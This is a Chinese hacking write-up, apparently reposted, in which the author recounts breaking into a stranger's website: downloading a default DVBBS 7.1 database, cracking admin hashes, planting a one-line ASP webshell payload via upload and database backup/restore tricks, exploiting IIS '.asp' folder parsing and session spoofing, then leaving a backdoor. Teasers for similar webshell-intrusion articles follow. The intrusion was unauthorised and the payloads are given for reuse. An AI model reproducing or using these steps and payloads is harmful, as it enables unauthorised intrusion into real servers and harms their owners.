DVBBS7.1后台备份得到一个webshell_漏洞研究

转自:http://www.wrsky.com/read.php?tid=565
作者:firefox+lvhuana

今天上午上网的时候,非常无聊,好友都不在线。

正在无聊的时候,突然qq响了,一个陌生人要加我,顺便先看下他的资料,哦哦,原来这个人还有个人站点呢,通过他加我请求。然后开始看他的个人站点,原来是一个外挂站,晕糊中,外挂站点的人加我作什么。。。。

想想进他的站点看看吧,打开明小子的旁注工具2.2版本(这个启动速度快,我喜欢),扫了一下,看到他站点所在的服务器上面还有几个站点,再仔细扫了一下,发现一个dvbbs7.1的论坛的数据库是默认的dvbbs7.mdb,下载之,然后杀毒软件查下没有木马存在(现在有些无聊的人喜欢放一个默认数据库名字的木马来钓鱼。。小心为好),打开数据库找到管理员的后台账号密码和前台账号密码散列,破解一下吧,运气不错,几分钟md5的散列破解完毕了,全数字的前台密码。

登陆进去,再登陆进后台。好久不搞国内站了,手生中。。。。老思路,上传一个自己制作的asp语句插入gif图片中的asp木马(当然是更改为.gif了)。上传成功,然后到后台去还原数据库去,晕乎乎的,怎么提示无法识别的数据库格式,失败了。。看来动网现在成熟的多了,估计是对文件的头部做了识别了??接着想办法吧。。

看到现在7.1版本的都有了blog功能了,在后台看看blog设置吧,突然看到有上传设置哦,而且还可以设置上传类型,增加一个mdb的文件格式吧,不错不错,增加成功。然后自己在本地建立一个空的mdb数据库,里面的内容为<%eval(request(\"lv\"))%>,然后把这个数据库上传,成功上传,再晕,怎么不是直接显示出相对路径的?而是fileid=1。。再到后台的blog管理那里找,找到上传的文件夹是Boke/UploadFile/,然后在上传管理那里找到了我上传的mdb文件,这下看看动网还能禁止我还原数据库么!?

成功还原数据库为.asp了,嘿嘿,一个webshell到手了,然后进入服务器,发现是win2k3的哦,看来执行cmd是没戏了,到处转转后找到d盘竟然能遍历,还有ser-u安装在d盘啊,浏览ServUDaemon.ini找到了目标站的物理路径,跳转到目标站的目录,然后留后门,好了,玩完了,撤退。

鉴于是win2k3系统的,大家都应该知道win2k3的一个文件夹名如果是.asp的话,这个文件夹里面的任何文件都做为asp来处理的,让我们再深入测试一下。在后台备份那里把备份路径改一下,改为.asp/,如果害怕失败的话,就用url编码一下那个.,就是%2easp/,然后备份数据库,这样就会得到一个.asp的目录,然后在上传设置那里把文件上传目录设置为.asp/,这样的话,所有的文件都上传到这个文件夹里了。回到前台,上传我的那个把一句话木马插入gif文件的那个2006s.gif,上传成功后,http://www.****.com/.asp/2006-2/200622714435439658.gif这个就是我们的shell了。用客户端连接,得到一个2006的webshell,不过输入密码后进入的时候会返回一个404错误,原因是ie把.asp后面的省略了,再次把http://www.*****.com/.asp/2006-2/200622714435439658.gif放在?%23=Execute(Session(%22%23%22))&pageName=PageList前面,seesion欺骗了一下,这个webshell就能正常使用了。

垃圾文章,可能还有其他更简单的方法,希望大家谁知道告诉一下。

时间: 2024-09-13 01:49:22

DVBBS7.1后台备份得到一个webshell_漏洞研究的相关文章

利用BBSxp后台的缺陷得到webshell_漏洞研究

遇一BBSXP后台: 查看源文件.也没有value可以自定义. 尝试修改上传类型. 无奈不支持php aspx. 向数据库里插入一句话再备份. 出现些XXX 估计表里加入了什么东.. 访问: /bbs/Admin_fso.asp?menu=files&dir=../ 可以看到整站文件.. 找到一个文件名不常见的后台.. 运气不错. 备份webshell之..

dvbbs7.1 照样从后台得到webshell_漏洞研究

文章作者:喜欢忧伤  信息来源:邪恶八进制安全小组  背景:  dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了  解决办法:  我把asp木马插入到数据库里,然后恢复.这样肯定检查肯定可以通过的.  具体过程:  前提:  (偶以默认的安装情况为准,具体情况的把握靠自己了.)  你得到论坛dvbbs7.1后台.  1.偶已经作好一个数据库了:里面插入了加密的asp后门[就是那个写马的后门]  同时已经修改名字成dvbbsToshell.gif

教你利用Log备份获取Webshell_漏洞研究

Blog被人渗透了一下,不知道各位掉了什么东西没有.原来有一次blog的目录可以列出来,那次我掉了一个小东西,然后今天别人告诉我NBSI 3用了那个东西的方法--呵呵,有点晕,就是下面的,成功率还是很高的,大家可以试试看.嗯,方法流出去无所谓,文章留着吧.  dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功率及重用性呢?如果单从调整

进一步取得MirCms传奇私服的WebShell_漏洞研究

在黑防的2005年第6期中,小狮子写了关于MirCms中投票子系统的漏洞,阅读以后觉得该系统既然存在像登录验证错误这样的漏洞就应该还存在其他的可以更进一步利用的漏洞.本文就利用该系统中的这些漏洞取得其WebShell.  一.取得管理员账号和密码.  网站根目录下的yns_tupdata.asp中存在SQL注入漏洞,我们利用其可以获取管理员的账号和密码,看下面的代码片断.  If (Request.QueryString("t_id") <> "") T

轻松获得oblog 2.52的WebShell_漏洞研究

来源:邪恶八进制 作者:千寂孤城  一.方法   1.先进后台.利用CheckUserLogined漏洞直接加个后台管理员.关于这个CheckUserLogined漏洞我在<Blog的噩梦>(http://www.eviloctal.com/forum/htm_data/10/0508/13721.html)中有详细的说明,大概就是说可以通过Cookies欺骗搞SQL注入.   2.在后台的"网站信息配置"处有个"普通会员上传文件类型",给它加一个aaa

利用Session欺骗构造最隐蔽的WebShell_漏洞研究

不知不觉"LM团伙"看黑防已有两个春秋了,期期不落.潜心修炼了这么久,也能开始耍上一两招了.看了黑防第二期的<DreamWeaver引发网络危机>一文,"LM团伙"内心有说不出的激动,心想网上有40%的网页都有这样的漏洞,那岂不是又能收获N多肉鸡了.可是仔细研究发现,这个文章的方法存在一些问题,并不像想象中的那样容易发挥.下面就与大家一起讨论一下Session.  既然是谈Session欺骗,那么就先来看一下Session到底是什么,它是怎么工作的.在A

Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范_漏洞研究

一.概述    漏洞介绍: http://coolersky.com/leak/programme/bbs/2006/0515/515.html     前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了,一直也没时间看看,下午跟Edward要了个链接看了看: http://www.eviloctal.com/forum/read.php?tid=22074     本站转贴为: http://coolersky.com/articles/hack/analysis/prog

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们

从一个0day漏洞看数据中心防护效果大比拼

记得郭德纲有这么一个著名的段子:家中屋漏,外面下小雨,屋里下大雨:外面下大雨,全家人就只能站到院子里避雨.如果我们把屋子换成伞,外面下雨,伞里也下雨,你还会用这样的伞吗?     "简直是笑话,谁会用这样的伞?",你可能会这么说.不过,是不是有漏雨的伞,咱先别着急下结论.这凡事都有个体验和比较.没有体验和比较,你就不知道到底什么样的伞叫好伞.     在前两天阿里云论坛的安全版块里有这么一个有趣儿的热帖.在这个帖子里,楼主讲了这么一个有趣儿的事儿:"我现在操作2个网站: 一个